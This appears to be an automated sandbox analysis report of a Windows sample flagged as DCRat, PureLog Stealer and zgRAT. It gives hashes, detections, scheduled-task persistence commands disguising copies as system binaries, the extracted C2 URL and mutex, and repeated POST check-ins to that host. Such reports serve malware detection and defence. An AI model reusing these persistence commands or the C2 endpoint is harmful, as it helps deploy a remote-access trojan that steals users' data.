
Windows Analysis Report
0JLWNg4Sz1.exe

Overview

General Information

Sample name:0JLWNg4Sz1.exe
renamed because original name is a hash value
Original sample name:844679E76D8254BEDD67C98610F7D7AC.exe
Analysis ID:1545098
MD5:844679e76d8254bedd67c98610f7d7ac
SHA1:4222ebbb055830096b829f072783423dbe255932
SHA256:9b08f03985d3378123ba236fae1b41b42fcc9af87932655a5120e04fa9a21942
Tags: DCRat, exe, user-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 0JLWNg4Sz1.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\0JLWNg4Sz1.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
    • schtasks.exe (PID: 7652 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7676 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7700 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7728 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7752 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7792 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7820 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7884 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 12 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7908 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7936 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7996 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8020 cmdline: schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8044 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8068 cmdline: schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8092 cmdline: schtasks.exe /create /tn "0JLWNg4Sz1" /sc ONLOGON /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8116 cmdline: schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 8144 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7164 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7212 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • DViaOgnvmAhwCXZ.exe (PID: 7760 cmdline: "C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • DViaOgnvmAhwCXZ.exe (PID: 7784 cmdline: "C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • 0JLWNg4Sz1.exe (PID: 7320 cmdline: C:\Users\user\Desktop\0JLWNg4Sz1.exe MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • 0JLWNg4Sz1.exe (PID: 7332 cmdline: C:\Users\user\Desktop\0JLWNg4Sz1.exe MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • smartscreen.exe (PID: 7304 cmdline: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • smartscreen.exe (PID: 7344 cmdline: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • cleanup
{"C2 url": "http://977255cm.nyashkoon.in/secureWindows", "MUTEX": "DCR_MUTEX-sKFQIzXKnAf7PnSalSzG"}
Source | Rule | Description | Author | Strings
0JLWNg4Sz1.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0JLWNg4Sz1.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.0JLWNg4Sz1.exe.fa0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.0JLWNg4Sz1.exe.fa0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                              System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\0JLWNg4Sz1.exe, ProcessId: 7556, TargetFilename: C:\Program Files (x86)\microsoft\Edge\smartscreen.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe", CommandLine: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe", ProcessId: 7304, ProcessName: smartscreen.exe

                              Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f, CommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\0JLWNg4Sz1.exe", ParentImage: C:\Users\user\Desktop\0JLWNg4Sz1.exe, ParentProcessId: 7556, ParentProcessName: 0JLWNg4Sz1.exe, ProcessCommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f, ProcessId: 7996, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T05:22:07.511045+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 188.114.96.3 | 80 | TCP


                              AV Detection

Source: 0JLWNg4Sz1.exe | Avira: detected
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\StartMenuExperienceHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://977255cm.nyashkoon.in/secureWindows", "MUTEX": "DCR_MUTEX-sKFQIzXKnAf7PnSalSzG"}
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | ReversingLabs: Detection: 65%
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe | ReversingLabs: Detection: 65%
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe | ReversingLabs: Detection: 65%
Source: C:\Recovery\DViaOgnvmAhwCXZ.exe | ReversingLabs: Detection: 65%
Source: C:\Recovery\StartMenuExperienceHost.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\ALzNWdSZ.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\KjTCumlu.log | ReversingLabs: Detection: 23%
Source: 0JLWNg4Sz1.exe | ReversingLabs: Detection: 65%
Source: 0JLWNg4Sz1.exe | Virustotal: Detection: 56%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | Joe Sandbox ML: detected
Source: C:\Recovery\StartMenuExperienceHost.exe | Joe Sandbox ML: detected
Source: 0JLWNg4Sz1.exe | Joe Sandbox ML: detected
Source: 0JLWNg4Sz1.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0JLWNg4Sz1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File opened: C:\Users\user\AppData\Local

                              Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 188.114.96.3:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
